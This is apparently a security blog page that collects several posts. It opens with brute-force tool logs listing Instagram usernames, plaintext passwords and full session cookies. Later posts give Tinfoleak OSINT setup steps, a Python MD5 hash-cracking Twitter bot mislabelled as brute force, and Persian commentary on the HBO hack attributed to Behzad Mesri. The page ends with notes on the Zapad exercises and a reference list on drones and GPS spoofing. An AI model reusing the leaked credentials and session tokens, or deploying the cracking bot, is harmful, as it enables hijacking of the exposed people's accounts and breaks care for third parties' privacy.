https://md_peyman_:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 153, Following: 40, Posts: 3, Is_Private: false, Orginal: false @hacracker||NVTBZPXLVZNTVOYKBCKG|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 153, Following: 40, Posts: 3, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511596710\054 \”94.102.54.95\”: 29073}:1eIVM6:HHX06aqY1uzYAw7jBcZkU399VwY”; ds_user_id=6327901837; Max-Age=7776000; csrftoken=eUMpIA9bhmrOg7UpIYu3DrLe16znmxvI; rur=FRC; sessionid=IGSC4a82a6b1ea7a31303c3262db10bb1725e4bc0fc664905ec23ca7c5dbd3d44493%3ARToYvA8P8osVSe5fMw8CygXRNiovgVV7%3A%7B%22_auth_user_id%22%3A6327901837%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226327901837%3Au1CQ4MU9Kbz0xPKFKHyJnkWK8gf4M2H2%3Abd83c854c07b2a4bd8d7f5b07553571d6c3a4c802a5b95c25d721e84124eaa10%22%2C%22last_refreshed%22%3A1511596708.7151811123%7D; target=””; mid=WhkipAALAAGQDOk5YauCtBMlEBoA; ig_vw=1024; ig_pr=1|||1511567887|0||3||||
https://mahsa.70.70.70:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 30, Following: 17, Posts: 4, Is_Private: false, Orginal: false @hacracker||STBYFDNGBEHFIHDBKDAS|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 30, Following: 17, Posts: 4, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511596850\054 \”94.102.54.95\”: 29073}:1eIVOM:mMN4PMtojZqy5QqvW6Ld2IdbfX4″; ds_user_id=6308474199; Max-Age=7776000; csrftoken=zbOjpxShHyuW8ammDGL9xHsVUPIdKoUP; rur=ATN; sessionid=IGSC2460f015a03398fbf80ac87e71638fe284970fa8c5cdaaec056c9ea93c5bb843%3AlQIkaYInFjFHOpqOgCglyfnd9ThT3Z3z%3A%7B%22_auth_user_id%22%3A6308474199%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226308474199%3AMn0xrYNhsWr7GiXoa1NgkWoyvRof7WtU%3A5169bb3bb3f67c97864bdc40c3a3248725fe5b118ddf5dc926a384356348e357%22%2C%22last_refreshed%22%3A1511596850.4464466572%7D; target=””; mid=WhkjMQALAAGQzaLx5Ma8mgAYUtpi; ig_vw=1024; ig_pr=1|||1511568027|0||3||||
https://_amir.rain:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 560, Following: 970, Posts: 19, Is_Private: false, Orginal: false @hacracker||FCUNFQPOWTLMMCWMVEOX|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 560, Following: 970, Posts: 19, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511597060\054 \”94.102.54.95\”: 29073}:1eIVRk:TZA3YRuKxGCCIBLWISg_HqqaOzk”; csrftoken=74AoeMN6n8wSL7hsd62bVaohbdnfnlwS; Max-Age=31449600; rur=FRC; mid=WhkkAwALAAEF74MMls9Arof8N1YZ; ig_vw=1024; ig_pr=1|||1511568237|0||3||||
https://davoodi3134:amir1380@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 231, Following: 302, Posts: 12, Is_Private: true, Orginal: false @hacracker||WNQGZYDUKEKEPAAWZTBE|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 231, Following: 302, Posts: 12, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511597307\054 \”94.102.54.95\”: 29073}:1eIVVk:QGlFBE_UR8bsO7Gll-mAfzxxRPo”; csrftoken=sQRcZ3agob5xAV8IkwGypQcvn2ZLYGi5; Max-Age=31449600; rur=FRC; mid=Whkk-wALAAHbjqYRxgb7unmv1B4M; ig_vw=1024; ig_pr=1|||1511568484|0||3||||
https://khanoom_heidarzadeh:ordibehesht@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 219, Following: 350, Posts: 36, Is_Private: false, Orginal: false @hacracker||ZMETDGUOFMHGDYTJVGKC|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 219, Following: 350, Posts: 36, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511600873\054 \”94.102.54.95\”: 29073}:1eIWRG:ME9wLHWH2BMkjKlZCcvpwZSk4GE”; csrftoken=poEwcwoOibPbUjuwYpBnnXFWvTuXET4z; Max-Age=31449600; rur=FRC; mid=Whky6AALAAFcaDElsXAcklYpW2xF; ig_vw=1024; ig_pr=1|||1511572051|0||3||||
https://abd_1266:ordibehesht@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 20, Following: 43, Posts: 0, Is_Private: true, Orginal: false @hacracker||FXGETYPZQIJIRZJSBRAL|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 20, Following: 43, Posts: 0, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511600949\054 \”94.102.54.95\”: 29073}:1eIWSU:gQu945UQk37HXSCnqKiYDQuweKM”; csrftoken=6MTDOVB9iQDTYuFkxNTVuoHjHbYu1obv; Max-Age=31449600; rur=FRC; mid=WhkzNAALAAFN2unptZ_dOAGk-eOJ; ig_vw=1024; ig_pr=1|||1511572126|0||3||||
https://soodabehshalikaran:khordad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 173, Following: 342, Posts: 16, Is_Private: true, Orginal: false @hacracker||FACWSLAPINDOTSBZXAOW|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 173, Following: 342, Posts: 16, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511605043\054 \”94.102.54.95\”: 29073}:1eIXWW:orRoSrjiq9bWf0N2xcjcvgAu6nY”; csrftoken=SzOaG6yFMxcQQNZm6hpiBydOLFPLH5I7; Max-Age=31449600; rur=FRC; mid=WhlDMgALAAH5Hcg4MStpKSmDQ_22; ig_vw=1024; ig_pr=1|||1511576220|0||3||||

Featured post

More Twitter action from Iran

***OSINT-Twitter-Tinfoleak***
Go to https://apps.twitter.com/ > Register & Login > Create new app >
Go to (Keys and Access Tokens) > Copy (CONSUMER_KEY & CONSUMER_SECRET) >
Go to (Create my access token)
> Copy (ACCESS_TOKEN & ACCESS_TOKEN_SECRET)
Open terminal
1.pip install tweepy
2.pip install
–upgrade exifread
3.pip install oauth2
4.pip install jinja2
5.apt install python-pyexiv2
-y
6.wget https://www.isecauditors.com/sites/default/isecauditors.com/files/files/tinfoleak-2.1-
SHA2017_Edition.zip
7.unzip tinfoleak-2.1-SHA2017_Edition.zip
8.cd tinfoleak-2.1-SHA2017_Edition
&& chmod +x *
9.leafpad tinfoleak.conf
Edit

CONSUMER_KEY =
CONSUMER_SECRET =
ACCESS_TOKEN =

ACCESS_TOKEN_SECRET =

Added

CONSUMER_KEY = (PASTE CONSUMER_KEY)
CONSUMER_SECRET =
(PASTE CONSUMER_SECRET)
ACCESS_TOKEN = (PASTE ACCESS_TOKEN)
ACCESS_TOKEN_SECRET =
(PASTE ACCESS_TOKEN_SECRET)

Save & Close
10.python tinfoleak.py -n (Username) -g
nicholasstoller.kml -o output.log
***OSINT-Twitter-Tinfoleak***

Featured post

Twitter Brute Force – Iranian hack

Iranian password cracking for twitter – within the last 72 hours

 

#!/usr/bin/env python

###################################

# Password cracking twitter V 1.0 #

# #

# : # # #

###################################

import os

import time

import twitter

import json

import random

from datetime import datetime

from hashlookup.LookupTable import LookupTable

CONSUMER_KEY = “”

CONSUMER_SECRET = “”

ACCESS_TOKEN_KEY = “”

ACCESS_TOKEN_SECRET = “”

POLL = 60

WORDLIST = ‘./crackstation-dist/crackstation.txt’

W = “\033[0m” # default/white

R = “\033[31m” # red

P = “\033[35m” # purple

C = “\033[36m” # cyan

bold = “\033[1m”

INFO = bold + C + “[*] ” + W

WARN = bold + R + “[!] ” + W

MONEY = bold + P + “[$] ” + W

TIME = lambda: str(datetime.now()).split(‘ ‘)[1].split(‘.’)[0]

print INFO+”%s: Logging into Twitter API …” % TIME()

api = twitter.Api(consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET, access_token_key=ACCESS_TOKEN_KEY, access_token_secret=ACCESS_TOKEN_SECRET)

indexes = {

‘md5’: ‘./crackstation-dist/crackstation-md5.idx’,

}

if os.path.exists(‘processed.pkl’):

with open(‘processed.pkl’, ‘r’) as fp:

processed = json.loads(fp.read())

print INFO+”%s: Loaded %d processed IDs” % (TIME(), len(processed))

else:

processed = []

def crack_hashes(algorithm, hashes):

results = []

if 0 < len(hashes):

lookup_table = LookupTable(

algorithm=algorithm,

index_file=indexes[algorithm],

wordlist_file=WORDLIST,

)

results = lookup_table[hashes]

return results

def process_request(mention):

hashes = filter(lambda word: len(word) == 32, mention.text.split(‘ ‘))

if len(hashes):

print INFO+”%s: Canidate hashes: %s” % (TIME(), hashes)

results = crack_hashes(‘md5’, hashes[0]) # Limit one hash atm

if results[hashes[0]] is not None:

message = “@%s I cracked your hash, the password is ‘%s'” % (

mention.user.screen_name, results[hashes[0]]

)

else:

message = “Sorry @%s but I couldn’t crack that hash :(” % mention.user.screen_name

else:

print WARN+”%s: No hashes found in request.” % TIME()

message = None

if message:

print INFO + “%s: Posting update \”%s\”” % (TIME(), message)

message += ” (%d)” % random.randint(0, 9999)

api.PostUpdate(message)

def poll_twitter():

mentions = filter(lambda m: m.id not in processed, api.GetMentions())

print INFO + “%s: %d new mention(s) to process” % (TIME(), len(mentions))

for mention in mentions:

process_request(mention)

processed.append(int(mention.id))

def run_forever():

while True:

time.sleep(POLL)

print INFO + “%s: Polling twitter API …” % TIME()

try:

poll_twitter()

except twitter.TwitterError as error:

print WARN+”%s: Error from API %s, sleeping for 5mins” % (TIME(), str(error))

if __name__ == ‘__main__’:

try:

run_forever()

except KeyboardInterrupt:

with open(‘processed.pkl’, ‘wb’) as fp:

fp.write(“%s” % json.dumps(processed))

print INFO+”%s: Saved processed to processed.pkl” % TIME()

 

und3rgr0und

Featured post

Behzad Mesri – #HBO Hack – Silent Terror

البته سوال اصلی من از همون اول که این دیفیسر رو میشناختم
این بود که چرا اسمش یه o کم داره
skote vahshat – 

BehzadMasri – skote_vahshat Get the scoop here (PDF)

بهزاد مصری

فکر کنم اول اشتباه نوشته و همون معروف شده و توی رو در بایستی مونده

Wired Article
حالا امیدوارم که زندگیش خراب نشه، ولی کاش مقامات به این سوال هم پاسخ میدادن

TBH2

این لاگ ها و پیست ها و دیتابیس هایی که توی فروم های زیرزمینی تبادل میشن رو احتمالن دیدید
هیچ امنیت و پرایوسی ای باقی نمونده و قطعن یکی از مشتریان اینها، یا حتا عامل لیک شدنشون خود سازمان های دولتی و امنیتی هستند
چندان عجیب نیست که یک نفر به این شکل مشخصاتش لو میره…
یعنی واقعن هم خیلی کار سختی نیست، با یه سیستم شخصی هم میشه مشابهش رو انجام داد، دیگه دولت که خیلی دستش بازتره

bm3

اونی که مرتکب یک جرم سایبری بزرگ میشه و لو نمیره یا لو میره ولی پیدا نمیشه خیلی کارش درسته…
واقعن کار سختیه… یعنی دائم باید از دید اونی که می خواد پیداش بکنه به موضوع نگاه بکنه و این از کاری که مرتکبش میشه هم مهم تر و شاید سخت تره

سکات وشات

TBH

ا📌 طلاعات تکمیلی در مورد بهزاد مصری و هک HBO

🔹 کشف حمله سایبری زمانی که Time Warner کمپانی پدر HBO در حال خریده شدن توسط AT&T به مبلغ ۸۵ میلیارد دلار بوده است، اتفاق افتاد. این کشف سهام اچ بی او را کاهش داد.

‼️ مصری ظاهرا نمایشنامه قسمت های ساخته نشده سریال های اچ بی او را نیز سرقت کرده است.

🔹 از سوابق مصرف هک کردن زیرساخت‌های انرژی اتمی اسرائیل می باشد.

🔹۷ اتهام مصری شامل «جرایم رایانه‌ای»، «جرایم مالی»، «اخاذی»، «سرقت هویت» و دیگر جرایم است. باور مقامات آمریکایی این است که وی در حال حاضر در ایران سکونت دارد.

🔹 متن ایمیلی که مصری به هک شدگان فرستاده شامل عبارت زیر بوده است:

“Hi to All losers! Yes it’s true! HBO is hacked!”

BM

🔹 مصری با نام مستعار Skote Vahshat حداقل ده اکسپلویت از نوع SQL Injection ثبت کرده، و ده ها سایت را دیفیس کرده است.

🔹 بر اساس ادعای مصری، وی بیش از ۱.۵ ترابایت داده به سرقت برده است.

🔴 گروه هکری OurMine کنترل حساب توییتر HBO را در شهریور ماه گرفتند. به نظر میرسد رمز این حساب توسط مصری به آنها منتقل شده است.

🔴 یکی از دلایل متهم شدن سریع مصری، تلاش وی برای تماس با خبرنگاران و رسانه های متعدد جهت تحت فشار گذاشتن اچ بی او برای پرداخت مبلغ اخاذی بوده است.

🔹 اولین اقدام مصری یافتن دسترسی از راه دور کارکنان به شبکه اچ بی او بوده که بتواند از همان طریق دسترسی خود به زیرساخت را حفظ نماید.

Featured post

Zapad Exercises – 2nd/3rd Order Effects

 

The recent Russian Zapad wargaming exercises included a plethora of electronic capabilities demonstration and potentially more. Russia is known to recently been involved in illegal immigration efforts in Sweden, Finland, and Norway along with hostile intent along its northern borders (Estonia, Latvia, Lithuania) including cell/communication tower tampering. Could the recent Zapad exercises be more than just wargaming?

Some What If thoughts on these non-linear actions:

– Testing capabilities, distance, strength, impacts
– Testing responses like a stone in pond
    – 2nd and 3rd order effects were measured to determine the impact on targets, targets responses, etc.
    – Russians had people in each target country assisting with target impacts
    – Russians monitored target government communications from within each country
    – Determine length of time for target government to respond and what methods were used and where to get communications back online (if at all) – the locations of the response represent capabilities unknown to Russia until such an exercise is performed
– Other possibles:
     – A cover for illegal activities that occurred during the exercise – a feint, a ruse
 – Testing a precursor to actual execution – that is why military exercises are performed
 – What capabilities are being left in the exercise areas; what is not being removed after the exercise using the exercise as a ruse to place assets close to Western borders that were not there before
 What do you think?
 https://uawire.org/news/media-belarusian-and-russian-militaries-are-jamming-mobile-communications-along-border-with-poland

Featured post

Drone Wars! Threats, Vulnerabilities and Hostile Use

Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_01Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_02Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_03Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_04Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_05Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_06Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_07Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_08Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_09Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_10Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_11Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_12Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_13Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_14Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_15Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_16Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_17Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_18Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_19Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_20Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_21Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_22Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_23Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_24Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_25Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_26Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_27Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_28Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_29Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_30Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_31Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_32Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_33Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_34Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_35Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_36Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_37Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_38Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_39Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_40Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_41Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_42Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_43Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_44Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_45Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_46Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_47Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_48Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_49Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_50Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_51Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_52Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_53Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_54Drone WARS presentation Cyber Event 100417 slides Rev17A_CMC RKN_201701002 (1)_Page_55

References

Adamy, D. (2001) EW 101 A First Course in Electronic Warfare, Boston: Artech House.

Adamy, D. (2004) EW 102 A Second Course in Electronic Warfare, Boston: Artech House.

Adamy, D. (2009) EW 103 Tactical Battlefield Communications Electronic Warfare, Boston: Artech House.

Adamy, D. (2015) EW 104 EW against a New Generation of Threats, Boston: Artech House.

Anonymous, (2017) GPS/SBAS Signal Generator, GSS4100, Spirent Communications Data Sheet. Satellite AIS, Exact Earth, Ltd.

Anonymous, (9/8/2017) Innovation: Simulating GPS Signals, GPS World, http://gpsworld.com/simulating-gps-signals/

Anonymous, (8/22/2017) Nationwide Automatic Identification System, www.navgen.uscg.gov

Anonymous, (8/22/2017) Long Range Identification and Tracking (LRIT) Overview, www.navgen.uscg.gov

Anonymous, (8/22/2017) How AIS Works, www.navgen.uscg.gov

Anonymous, (2015) Satellite AIS, Exact Earth, Ltd.

Anonymous, (6/21/2015) Cyber Threats against the Aviation Industry, in SCADA on April8, 2014, INFOSEC Institute.

Anonymous, (2012) A Guide for Testers of GPS Devices and Systems, spectracom, Test & Measurement technical Note, TN15-101A – What You Want to know about GPS.

Anonymous, (5/14/2012) what is a GPS Simulator? Spectracom, Test & Measurement White Paper, WP08-101A.

Anonymous, (1/10/2014) GPS Signal Plan, Navipedia, http://www.navipedia.net/index.php/GPS_Signal_Plan

Anonymous, (4/2017) Counter-Unmanned Aircraft System Techniques, HQ, Department of the Army, ATP-3-01.81, https://fas.org/irp/doddir/army/atp3-01-81.pdf

Atayero, A.A, Luka, .K. & Alatishe, A.A (8/2011) Satellite Link Design: A Tutorial, International Journal of Electrical & Computer Sciences, IJECS-IJEND Vol: 11 No: 04.

Balduzzi, M., Wilhoit, K., & Pasta, A. (2014) A Security Evaluation of AIS, Trend Micro Forward-Looking Threat Research

Barker, B.C Capt., et.al. (2006) Overview of the GPS M-Code Signal, MITRE Report.

Bay-Yen, J. (2000) Chapter 5: GPS C/A Code Signal Structure, Fundamentals of Global Positioning System Receivers: A Software Approach, New York: John Wiley, http://read.pudn.com/downloads85/ebook/326017/Fundamentals%20of%20Global%20Positioning%20System%20Receivers/booktext05.pdf

Bhatti, J. & Humphreys, T. E. (2016) Hostile Control of Ships via False GPS Signals Demonstration and Detection, Navigation: Journal of the Institute of Navigation, Vol. 64, No.1, Spring 2017.

Buesne, G & DeSanto, D. (2017) GNSS Receivers and the Cyber-Threat: Lessons from the Information Security Community, Spirent Communications, Baltimore, MD

Buesne, G & Holbrow, M. (6/29/2017) GNSS Threats, Attacks and Simulations, Spirent: PNT Advisory Board, Baltimore, MD

Bussert, J.C. (10/2013) China Expands Influence through Electronics, Signal Magazine, https://www.afcea.org/content/china-expands-influence-through-electronics

Chachak, E. (retrieved 9/1/2017) U.S. Naval Mishaps – Human Error or Cyber Malfeasance? CyberDB.https://www.cyberdb.co/u-s-naval-mishaps-human-error-or-cyber-malfeasance/

Crosby, J. (12/16/2017) here’s What USNS Bowditch Does, Inverse Innovation, https://www.inverse.com/article/25346-usns-bowditch-underwater-drone-stolen-china

Demchak, C., Patton, K, T. & Tangredi, S.J. (8/25/2017) why are our Ships Crashing? Competence, Overload, and Cyber Considerations, Center for International Maritime Security. https://www.realcleardefense.com/articles/2017/08/25/why_are_our_ships_crashing_competence_overload_and_cyber_considerations_112152.html

Dupont, G. (2017) SIEM Fundamentals for your Threat Intelligence Program, Recorded Future, https://www.recordedfuture.com/security-operations-center-fundamentals/

Easton, R.D. & Frazier, E.F. (2013) GPS Declassified: From Smart Bombs to Smartphones, University of Nebraska Press.

FCC Wireless Telecommunications Bureau, Marine VHF Radio Channels, per 47 CFR 80.371© and 80.373(f)

Fessenden, F. & Watkins, D. (6/18/2017) the Path of the Container Ship that Struck a U.S. Destroyer, NYT. https://www.nytimes.com/interactive/2017/06/18/world/asia/path-ship-hit-uss-fitzgerald.html?mcubz=3

Gaertner, U (2013) UAV Swarm Tactics: An Agent-Based Simulation and Markov Process Analysis, Naval Postgraduate School Thesis.

Haider, Z. & Khalid, S. (8/2016) Survey on Effective GPS Spoofing Countermeasures, 6th International Conference on Innovative Computing Technology (INTECH 2016), https://www.researchgate.net/publication/313543601_Survey_on_effective_GPS_spoofing_countermeasures

Heath, T. (5/7/2015) How to Hack a Military Drone Parts I & II, Technology-Hackers, www.cybersecurityintelligence.com/blog/

Hodge, H. (8/23/2017) why are Navy Ships colliding in the Pacific? Experts Weigh In, Military.com

Homeland Security (2017) Improving the Operation and Development of Global Positioning System (GPS) Equipment Used by Critical Infrastructure, NCIC/NCC Unclassified report.

Hurley, M. (9/2017) Beyond the Iron Triad: The Future of Airborne C2ISR, Arlington, VA: Mitchell Institute for Aerospace Studies.

Humphreys, T.E, e. al. (1/1/2009) assessing the Spoofing Threat: Development of a Portable Civilian GPS Spoofer, https://gps.mae.cornell.edu/humphreys_etal_iongnss2008.pdf, Cornell University

Humphreys, T.E, (7/18/2012) Statement on the Vulnerability of Civil Unmanned Aerial Vehicles and Other Systems to Civil GPS Spoofing, Submitted to the Subcommittee on Oversight., Investigations, and Management of the House Committee on Homeland Security.

Kao, Lee, Chang, and Ko. (2007) A Fuzzy Logic Method for Collision Avoidance in Vessel Traffic Service, Journal of Navigation, 60, 17-31.

John, E.N & Schrage, D.P (2017) System Integration and Operation of a Research Unmanned Aerial Vehicle, Atlanta GA: School of Aerospace Engineering, Georgia Institute of Technology.

LaGrone, S. (8/21/2017) Chain of Events Involving U.S Navy Warships in the Western Pacific Raise Readiness, Training Questions, USNI News

LaGrone, S. (1/31/2017) Cruiser USS Antietam Runs Aground in Tokyo Bay, Spills Oil, USNI News.

Mccaslin, I.B. (2017) Red Drones Over Disputed Seas: A Field Guide to Chinese UAVs/UCAVs Operating in the disputed East and South China Seas. Project 2049 Institute.  http://project2049.net/documents/Red%20Drones%20Over%20Disputed%20Seas_PLA_Project2049.pdf

News Correspondent, (8/22/2017) USS McCain crash is 4th Navy Accident in Pacific this Year, The Washington Post, AP.

News Correspondent, (8/31/2017) DDG 51 Arleigh Burke Class Destroyer, Military.com

News Correspondent, (8/21/2017) CNO Orders Operational Pause, Review After Latest Ship Collision, Military.com

News Correspondent, (8/21/2017) 10 Sailors Missing, 5 injured after Destroyer Collides with Tanker, Military.com

News Correspondent, (8/22/2017) Remains of Navy Sailors found on USS John S McCain, Military.com

News Correspondent, (8/17/2017) Navy Fires Commander, XO from USS Fitzgerald for Fatal Collision, Military.com

News Correspondent, (7/21/2017) Investigation Faults Navy in Fitzgerald Collision Report, Military.com

News Correspondent, (6/20/2017) Stories of Fitzgerald Sailors Killed in Destroyer – Container Ship Crash, Military.com

News Correspondent, (6/16/2017) US Navy Destroyer Collides with Japanese Merchant Ship, Military.com

News Correspondent, (5/09/2017) US Navy Ship Collides with South Korean Fishing Boat, Military.com

News Correspondent, (1/31/2017) Oil Spill in Tokyo Bay After Navy Cruiser Runs Aground, Military.com

Nichols, R.K (8/31/2017) Stand By for a whole slew of military short articles on the Navy Collisions (my students only), Private memo to COT799 & CMST 455.

Nichols, R.K. & Lekkas, P.L. (2002) Wireless Security: Threats, Models, Solutions, New York, McGraw Hill.

O’Donnell, W. (2017) Interview with Navy Captain. http://inmilitary.com/real-reason-us-navy-keeps-hitting-merchant-vessels/

Ranganathan, A, et.al, SPREE A Spoofing Resistant GPS Receiver, Department of Computer Science, ETH Zurich, Switzerland, Zurich Information Security and Privacy Center.

Richardson, J. Adm., (8/31/2017) No Evidence of Hacking in McCain and Fitzgerald Collisions, Military.com

Rudow, l. (2014) Where to Mount a Radome for best Performance, Boat US, http://www.boatus.com/magazine/2014/june/mounting-a-radome.asp

Schallhorn, K., (9/1/2017) US Military crashes, collisions in the Pacific, FoxNews. http://www.foxnews.com/us/2017/08/28/us-military-crashes-collisions-in-pacific.html

Schmidt, D.et.al., (5/2016) A Survey and Analysis of the GNSS Spoofing Threat and Countermeasures, ACM Computing Surveys, Vol 48, No 4, Article 64

Sickle, J.V. (8/25/2017) GEOG 862 GPS and GNSS for Geospatial Professionals, Lessons 1-10 complete, Penn State University, College of Earth and Mineral Sciences  https://www.e-education.psu.edu/geog862/node/1407 [ Superb Course on the subject]

Sterling, J. 8/21/2017) A Spate of US Navy warship accidents in Asia since January, CNNNEWS. http://www.cnn.com/2017/08/21/politics/navy-ships-accidents/index.html

Tucker, P., e. al. (9/2017) Beyond GPS: Upgrading the Military’s Navigation-and-timing Backbone, Defense One, e-Book.

Volpe, J.A, (8/29/2001) Vulnerability Assessment of the Transportation Infrastructure Relying on the Global Positioning System, Final Report, Office of Assistant Secretary for Transportation Policy, U.S. Department of Transportation, John A Volpe Transportation Systems Center.

Warner, J.S. % Johnson, R.G. (2013) A Simple Demonstration That the Global Positioning System (GPS) is Vulnerable to Spoofing, Journal of Security Administration, https://pdfs.semanticscholar.org/8ddb/89f56dd3e2ae265047822bc47cfb06815d9a.pdf, LAUR-03-6163.

Warner, J.S. % Johnson, R.G. (2003) GPS Spoofing Countermeasures, Journal of Security Administration, LAUR-03-2384, Los Alamos, NM:  Los Alamos National Laboratory

Weise, E. (8/23/2017) Could Hackers Be Behind The U.S. Navy Collisions? USATODAY.

Patents

Berry, R. & Cook, C. (2016) Detection of wireless data jamming and spoofing, US 9466881 B1

 

Blogs

Banggood Blog (9/14/2017) Whats the difference between RHCP and LHCP antennae?     https://blog.banggood.com/rhcp-and-lhcp-whats-the-difference-29046.html

King Blog (9/14/2017) what is the difference between Azimuth and Elevation? https://kingconnect.com/what-is-the-difference-between-azimuth-and-elevation/

Mike Willis Blog (9/13/2017) Propagation. http://www.mike-willis.com/Tutorial/propagation.html

Law and Cyber Warfare Blog. Groll, E. (2017) Investigating if Destroyer Crash was Caused by a Cyber Attack, http://www.jlcw.org/u-s-navy-investigating-if-destroyer-crash-was-caused-by-cyberattack/

Wikipedia

Editor (8/31/2017) GPS Block IIIA, Wikipedia, https://en.wikipedia.org/wiki/GPS_Block_IIIA

